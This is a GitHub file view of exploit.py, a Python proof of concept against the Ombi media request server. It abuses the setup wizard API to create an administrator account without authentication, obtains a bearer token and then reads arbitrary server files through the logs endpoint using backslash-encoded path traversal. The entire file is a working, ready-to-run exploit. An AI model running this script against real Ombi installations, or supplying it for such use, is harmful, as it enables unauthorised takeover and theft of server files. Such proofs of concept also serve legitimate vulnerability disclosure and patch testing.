-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathexploit.py
More file actions
84 lines (70 loc) · 2.82 KB
/
Copy pathexploit.py
File metadata and controls
84 lines (70 loc) · 2.82 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#!/usr/bin/env python3
import argparse
import requests
import secrets
import sys
requests.urllib3.disable_warnings()
def check_connection(url):
print("[+] Checking accessibility ({0}) status... ".format(url), end='', flush=True)
try:
r = requests.get(url, verify=False, timeout=10)
if r.status_code == 200:
print("AVAILABLE")
return
except:
pass
print("UNAVAILABLE")
sys.exit(1)
def create_admin_account(username, password, url):
print("[+] Attempting to create '{0}' with password '{1}'".format(username, password), flush=True)
endpoint = '/api/v1/Identity/Wizard'
payload = {'username':username,'password':password,'usePlexAdminAccount':False}
r = requests.post(url + endpoint, json=payload, verify=False, timeout=10)
resp = r.json()
if resp['result']:
print("[*] Successfuly created {0} at {1}".format(username, url), flush=True)
else:
print("[!] The Ombi install is either patched, not vulnerable or already exploited.", flush=True)
sys.exit(0)
def get_bearer_token(username, password, url):
print("[+] Attempting to retrieve bearer token... ", end='', flush=True)
endpoint = '/api/v1/token/'
payload = {'username':username,'password':password,'usePlexOAuth':False}
r = requests.post(url + endpoint, json=payload, verify=False, timeout=10)
resp = r.json()
if resp['access_token']:
print("Successful")
return resp['access_token']
else:
print("Unsuccessful")
sys.exit(1)
def get_file_contents(token, path, url):
print("[+] Attempting to read {0}".format(path), flush=True)
endpoint = '/api/v2/system/logs/'
headers = {'Authorization': 'Bearer ' + token}
r = requests.get(url + endpoint + path, headers=headers)
if r.status_code == 200:
print(r.text)
else:
print("[!] Failed reading file.")
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description='Ombi admin creation POC.')
parser.add_argument('--scheme', help='The scheme e.g. http or https')
parser.add_argument('--hostname', help='The hostname e.g. 127.0.0.1')
parser.add_argument('--port', help='The port e.g. 5000')
parser.add_argument('--path', help='The relative path of the file to read.')
args = parser.parse_args()
if args.scheme and args.hostname and args.port:
url = args.scheme + '://' + args.hostname + ':' + args.port
username = 'administrator'
password = secrets.token_urlsafe(16)
check_connection(url)
create_admin_account(username, password, url)
if args.path:
bearer_token = get_bearer_token(username, password, url)
get_file_contents(bearer_token, args.path.replace('/', '%5C'), url)
else:
parser.print_help()
if __name__ == '__main__':
main()